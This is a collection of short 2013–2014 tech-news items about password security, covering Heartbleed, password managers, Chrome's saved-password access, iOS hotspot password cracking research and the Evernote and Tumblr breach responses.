password
Latest
What is Heartbleed, anyway?
If you're an IT professional, gadget blogger or token geek in your circle of friends, chances are, you've been hounded relentlessly over the past couple of days about "this Heartbleed thing." "Do I need to update my antivirus?" "Can I login to my bank account now?" "Google already fixed it, right?" We've heard them all, but the answers aren't all that clear or simple. In an attempt to take the pressure off -- it is the weekend after all -- we've put together a primer that should answer all of those questions and a few more. Next time someone asks you about that "Heartbleed thing," just shoot them in our direction.
Jose Andrade04.12.2014LastPass for Android can now fill your app logins in for you
You may know LastPass, the cross-platform password manager, as a safe haven for website login details and common form info. Now, as well as playing nice with Chrome for mobile devices, the latest version of LastPass for Android can fill in app login data for you, too. Once it's updated and you've authorized this new feature, loading up an app with a username / password prompt will trigger a pop-up with suggested login credentials you can choose to inject. Chances are, however, you'll need to tell LastPass which of the logins stored in your vault the mobile app wants -- you can also share your selection if you'd like to help it learn common associations. Because apps are often mobile portals for services you'd load up inside a browser on your computer, it makes sense. Then again, we can't say we sign in and out of apps enough to justify $12 per year for the premium service LastPass' mobile apps require.
Jamie Rigg03.26.2014Twitter accidentally mass-resets user passwords, blames 'system error'
Don't freak out, your Twitter account wasn't hacked. Well, probably. Many users were summarily locked out of their Twitter account on Monday evening, and were then sent an email requesting that they reset their password. However, it wasn't nefarious hackers or bots, but a system error. Twitter has released a statement, saying that it had "unintentionally sent some password reset notices tonight due to a system error." According to Recode, the error affected less than one percent of Twitter users. If you're an unlucky one-percenter, you should be able to reclaim access after you've updated your password. [Thanks to everyone who sent this in.]
Mat Smith03.04.2014Mnemonizer uses one weird trick to obscure passwords
I subscribe to the xkcd school of password philosophy. Multiple words are a big pain to type, but they offer good security and memorization. If you prefer to use shorter codes, especially for touch-input devices, consider Mnemonizer (US$0.99). It provides a novel security approach, enabling you to obscure your codes in plain text. The app works by providing a random data generator, which surrounds your PIN codes and passwords with similar-looking elements. You pick the pattern and enter your custom data by editing whichever cells you desire. You can build your item in a simple line, as a skip pattern or even as a zig-zag. However you hide your information, the app provides a camouflaging environment to surround it. Once created, add a context name and your stored information is ready to use. Aesthetically, I found the interface to be gorgeous. There are some absolutely lovely design choices that make the app a pleasure to use. Less pleasurable, however, is how easy it is to reset data for any password. If you tap the scramble option, your cells reset, replaced with random values. All stored information is lost. Unfortunately, you don't need any special password or privileges to do this, so anyone randomly picking up your phone can really mess up your saved information. The app really needs a passcode to enable any data modification for existing mnemonized items. I don't think I'd use this app to store long values like credit card numbers and I suspect I'd use the same visual sequence across every PIN, which would introduce its own vulnerability. Once anyone figured out one of my PINs they'd have access to all of them. Even if this particular app doesn't really work with my personal style, I suspect it will be valuable enough for those who can leverage its clever approach. That said, I look forward to seeing what other apps the developer creates. I really liked supporting elements even if the main feature isn't really my thing and I'd love to see those great design touches in other apps.
Erica Sadun02.06.2014Mozilla makes it a lot easier to sync Firefox bookmarks and passwords
Firefox users keen to keep their browsing data up-to-date across devices will soon have one less headache to worry about. Mozilla, makers of the popular open-source browser, has decided to do away with synchronization keys for its Firefox Sync service, opting instead to utilize a simple email and password combo similar to Google Chrome accounts. The change comes after users were forced to store an auto-generated authorization code, which, if lost, would render their bookmarks, passwords and browsing history inaccessible. While it means Sync accounts are a little more traceable, in that Sync data will be directly linked with a user's email address, the new process will enable Firefox users to quickly restore their browsing data in the event of a catastrophe like a hard drive failure. Mozilla is currently testing the new version of Firefox Sync in Nightly browser builds, meaning you'll need to install a beta version of Firefox to try it, but we expect it to make its way to a public release in the not-too-distant future.
Matt Brian02.04.2014Google rolls out extra password security to Chrome for Windows
When Google finally relented and tightened Chrome security in order to better protect user passwords, it was available only to Mac users. As spotted by Chrome enthusiast François Beaufort, that feature has now come to Windows, and asks users to authenticate themselves before they can access saved credentials inside their browser. Previously, users could access a plaintext list of saved passwords by pointing the browser at "chrome://settings/passwords," offering easy access to a third party if their computer was left unattended. While the feature has yet to make it to public version of the browser, its inclusion in the latest Chromium builds for Windows and Mac suggests it won't be long until password-protected passwords roll out to all.
Matt Brian12.04.2013Sony resetting some PSN passwords as a 'precautionary measure'
PSN users around the world have been booting up their various consoles only to be confronted with a message saying their passwords are incorrect. They've then had to go through the rigmarole of creating new login details, usually while still in the dark as to what happened to their accounts in the first place -- and whether they might have been hacked. Sony has since put out an explanation via various official channels in the US, EU and Japan, saying that only "some" users have been affected and that the password resets are "purely a precautionary measure" for "routine protection." We've contacted the company for clarification on its policy about contacting users individually in this sort of situation, and also to see if we can find out a little more about this "non-specific" threat to certain accounts.
Sharif Sakr11.26.2013NSA reportedly cracks down on staff who thought it was okay to share their logins with Edward Snowden
In a slightly ironic twist for the National Security Agency, Reuters reports that as many as 25 members of its staff have been "removed from their assignments" because they shared their private passwords with Edward Snowden while he worked there. A number of government offices are currently trying to find out just how Snowden got hold of so much confidential data, and sources close to those investigations now claim that the PRISM whistleblower used his position as a systems admin to dupe colleagues into handing over their passwords. It's not clear whether the NSA staff involved in the breach have been fired or re-assigned, but if the allegations are true then there are likely to be some red faces at the agency once the various investigations reach their conclusions, because such a large-scale failure by supposedly highly-trained staff would implicate the NSA's systems and practices, rather than just a few naive individuals.
Sharif Sakr11.08.2013Google finally tightens access to saved passwords in Chrome
Having come under fire over its relaxed attitude towards saved passwords in Chrome earlier in the year, Google is finally looking to do something about it. In a post to his Google+ page, Chrome tinkerer François Beaufort notes that the company will now ask users to authenticate themselves using a system password before they can access saved credentials inside Chrome. Previously, users could access the list of saved passwords by pointing the browser at "chrome://settings/passwords," offering easy access should their computer be left unattended. As it stands, the feature appears limited to the latest Chromium build for Mac, mimicking the behavior of Apple's own web browser: Safari. While there's no word on whether Google intends to implement the feature inside Chrome for Windows, its inclusion on the Mac suggests it could be present inside a public release in the near future. [Image Credit: Francois Beaufort, Google+]
Matt Brian11.04.2013Blizzard's tips for dealing with a locked account
Having your account locked isn't an uncommon problem -- and it doesn't necessarily mean your account has been compromised. Because Blizzard is trying to stop hackers in their tracks, doing anything that makes it look like you aren't the one playing the game -- like logging in from an unusual location -- can trigger a lock. So what's a gamer to do when hit with a locked account? Fortunately for all of us, Blizzard CS representative Araxom has explained how to avoid locked account woes -- without even getting in touch with customer support. An easy fix? Change your password from your new computer or new location. This requires you to authenticate with Blizzard -- and answer your secret question -- so the servers are sure that you're actually you. Another helpful tidbit: have an authenticator (or authenticator app) attached to your account and SMS protect enabled. These helpful security features not only make it harder for your account to get stolen -- they can make it clear to Blizzard that your account is in your hands, even if you're logging on from a new computer. For more details and tips, check out Araxom's thread on Reddit. And if your account actually has been hacked, it's going to take a few more steps, but we'll walk you through it.
Elizabeth Harper10.27.2013Finding passwords saved in Chrome is surprisingly easy, Google security lead sees no issue
Most browsers will ask if you want your passwords saved so when you're next jumping around the web, logging into sites is that bit easier. Of course, you'd like think those passwords are squirreled away where no one can dig them up, but in Chrome they're pretty easy to find. As highlighted by software developer Elliott Kember recently, getting access to the list of saved passwords requires only that you point the browser at "chrome://settings/passwords" (or simply find the password management option in advanced settings) and click on one of the saved entries. A small "show" button will then appear next to the hidden password -- hit that and it'll be revealed. Calling this a major security flaw, as some have, is obviously a tad sensationalistic. Nevertheless, recent attention has shown that making saved password access so simple is a concern for some. Several other browsers give users the option to protect that list with a master password, but Chrome does not -- even if you sign out of the browser, data linked to your Google account remains visible on that computer. Justin Schuh, Chrome security tech lead, has responded to internet chatter on the topic, saying that once past the OS login stage, someone can theoretically find your passwords and all manner of other browser info out anyway, using various underhand means. His statement isn't likely to calm those who'd like to see their passwords more secure, but perhaps the fact people are talking will force Google to consider some changes. Update: This post has been edited with some additional context and commentary.
Jamie Rigg08.07.2013Tumblr releases emergency update to fix password-sniffing bug
Tumblr has released an emergency update for its iOS app to fix a bug that allowed people to sniff out passwords. Tumblr was notified of the security vulnerability today. The company says that if you have been using its iOS apps, you should also update your Tumblr password and your password on any sites where you use the same password. From the company's blog: Important security update for iPhone/iPad users We have just released a very important security update for our iPhone and iPad apps addressing an issue that allowed passwords to be compromised in certain circumstances¹. Please download the update now. If you've been using these apps, you should also update your password on Tumblr and anywhere else you may have been using the same password. It's also good practice to use different passwords across different services by using an app like 1Password or LastPass. Please know that we take your security very seriously and are tremendously sorry for this lapse and inconvenience. ¹ "Sniffed" in transit on certain versions of the app Tumblr can be downloaded from the App Store here. By downloading the latest version you will have closed the password security hole.
Michael Grothaus07.17.2013Tumblr for iOS receives critical security update, users urged to change passwords
A fresh version of Tumblr just hit iOS devices less than a week ago, but now the Yahoo-owned service is pushing out a newer release with "a very important security update." Not only is the outfit recommending that users download the tweaked app immediately, but it's also asking folks to change their password on Tumblr and on any other service they use the same passphrase. There's no mention of a breach or exactly what the new code patches up, but we'll keep you in the proverbial loop as we learn more. Update: We've gotten word from Tumblr that it was notified of a security vulnerability and immediately dispatched the update to remedy the issue. Hit the break to read the outfit's entire statement.
Alexis Santos07.16.2013PSA: You can now use your Amazon account to log into Lovefilm
You might be able to knock one password off your list, as you now have the option to log in to your Lovefilm account using Amazon credentials. The changeover is part of the online retail giant's recently announced Login With Amazon initiative, intended to let you use a universal ID for its other websites or those of third party developers. To switch, you'll need to follow the link at the source and enter both your Lovefilm and Amazon details, and may need to re-enter payment info as well. The company promised that your private data will remain "completely safe," and said that any rental lists, bookmarks, viewing history and watchlists will stay put. On the off-chance you're on Lovefilm but don't have an Amazon account, the company wouldn't be adverse to your creating one at the same time, in case you fancy physical disc media to go along with the streaming variety. That's not the only change Lovefilm users may notice however, as the service has rolled out versions of its next generation streaming app -- first seen on the PS3 -- for the Xbox 360 as well as Sony Bravia TVs, Blu-ray players and home theater systems.
Steve Dent06.26.2013Researchers easily crack iOS-generated Hotspot passwords
When you enable the Personal Hotspot feature on your iPhone, iOS will generate a password on your behalf. It's convenient, but recent research from FAU in Germany suggests it is not very secure. According to researchers Andreas Kurtz, Felix Freiling and Daniel Metz, the default hotspot password in iOS 6 uses a short English word with some random numbers at the end. Earlier versions of iOS used a similar pattern that included two words separated by two numbers. Not surprisingly, these passwords can be cracked in no time via a brute-force attack. Using one AMD Radeon HD 6990 GPU, the team was able to guess a password in 50 minutes. When they bumped the GPUs up to four AMD Radeon HD 7970s, they were able to drop the password-cracking time to a mere 50 seconds. One reason the cracking was so easy is that Apple apparently uses a password list that picks from 1,842 words, and the selection of these words is not done randomly. It wouldn't take much effort for a savvy hacker to figure out this pattern and write a tool that would compromise a hotspot password faster than you can say supercalifragilisticexpialidocious. The take home message is to change your hotspot password from the default one that is generated by iOS to one of your own choosing. It's easy enough to do -- just tap Settings > Personal Hotspot or Settings > General > Cellular > Personal Hotspot, depending on your device and software. Then tap the WiFi password field and type in a new phrase. The new password must be at least eight characters long and use ASCII/Unicode characters. You can read more about the Personal Hotspot feature on Apple's iOS support page. [Via Engadget]
Kelly Hodgkins06.19.2013Researchers able to predict iOS-generated hotspot passwords in less than a minute
Anyone who's tried to tether to their iPhone or iPad will recall how iOS manages to craft its own passwords when used as a personal hotspot. The aim is to ensure that anyone sharing a data connection will get some degree of security, regardless of whether or not they tinker with the password themselves. However, three researchers from FAU in Germany have now worked the structure behind these auto-generated keys -- a combination of a short English word and a series or random numbers -- and managed to crack that hotspot protection in under a minute. To start, the word list contains about 52,500 entries, and once the testers were able to capture a WiFi connection, they used an AMD Radeon HD 6990 GPU to cycle through all those words with number codes, taking just under 50 minutes to crack with rote entry. Following that, they realized that only a small subset (just 1,842) of the word list was being used. With an even faster GPU -- a cluster of four AMD Radeon HD 7970s -- they got the hotspot password cracking time to 50 seconds. The Friedrich-Alexander University researchers added that unscrupulous types could use comparable processing power through cloud computing. "System-generated passwords should be reasonably long, and should use a reasonably large character set. Consequently, hotspot passwords should be composed of completely random sequences of letters, numbers, and special characters," says the report, which outlines the trade-off between security and usability. However, as ZDNet notes, Apple's cycled password approach still offers more protection than static options found elsewhere. Check out the full paper at the source.
Mat Smith06.19.2013Amazon announces new 'Login with Amazon' service for apps, games and websites (video)
In an effort to reducing keyboard wear-and-tear, Amazon is opening up its own login service to both app developers and websites. Login With Amazon taps into your account credentials to login, with the ability to even share parts of your profile through apps, games and sites. It uses the retailer's existing trusted sign-in security and has already been tested on both Zappos and Woot, with both trials apparently noting "significant" pickup from customers. The service is free to use and if you're thinking of adding it to your own site (and tapping into those 200 million registered Amazon users), you can find all the technical details at the source -- or a gentler explanation in a video after the break.
Mat Smith05.29.2013Microsoft leak details plans for two-step authentication process
Smoke goes up. Lights fade. The crowd roars. It's 2003, and the Dave Matthews Band is about to perform what would go on to become the theme song for security processes the world over a decade later. Weird visualizations aside, it sure seems as if two-step authentication has become all the rage these days. With Google implementing the process in 2011, both Apple and Dropbox have followed, and Evernote has made clear that it's going to join the fray as soon as feasible. Now, leaked imagery is demonstrating that Microsoft might not be far behind, with a two-step verification process evidently planned for its online services. As you'd expect, the process should work pretty simply once it's instituted -- you'll need to enable two-step on your account, and then use an app on your mobile device to retrieve randomized keys when logging into a computer that's not on your trusted device list. Notably, the process isn't expected to work with linked accounts, and while a Windows Phone app appears to already be floating about, there's no word on whether Android, BlackBerry or iOS users will receive the same courtesy. Till then, keep your passwords guarded. And, of course, watch the video embedded after the break.
Darren Murph04.09.2013Chrome 26 for Android gets stable release with autofill and password syncing
Perpetually forgetful Android users no longer have to adopt a Chrome beta to coordinate their lives. Just a month after the test version of Chrome 26 arrived with autofill and password syncing, its stable version has appeared with the same option to remember form and login details between supporting desktop and mobile Chrome builds. There's no talk of the SPDY-based proxy, however: aside from tune-ups, the syncing is the main highlight. That's still enough for us to justify swinging by Google Play for the update.
Jon Fingas04.03.2013Evernote forces password reset after "suspicious activity"
The drumbeat of corporate security issues pounds on, with hybrid cloud/local notekeeping service Evernote reporting this weekend that its internal security team "discovered and blocked suspicious activity" aimed at sensitive areas of Evernote's service. Although neither billing information nor actual client notes were exposed in this breach, Evernote does acknowledge that some user account information -- usernames, email addresses and encrypted passwords -- was accessed. While none of the user passwords were stored in the clear, the fact that they may be in the hands of hackers (along with the corresponding user credentials) led Evernote to force a password reset for all its millions of users. If you've gotten a password reset notice from Evernote, it's almost certainly legitimate, but in the interest of proper procedure you should not click the login link in the email. Open a trusted browser (these days, that means one with Java applets disabled) and type in "www.evernote.com" directly to reset your login credentials. If you need help generating and storing a strong password, our guide to password creation is here for you. As more and more cloud services are subject to attacks that target user login details, it's become overwhelmingly clear that just having a strong password isn't enough; if you reused your Evernote password on any other service (especially your email account), you have a potentially serious problem. Managing unique passwords for scores or hundreds of accounts is no picnic, but utilities like 1Password or LastPass can make it easier to find and change your re-used passwords.
Michael Rose03.03.2013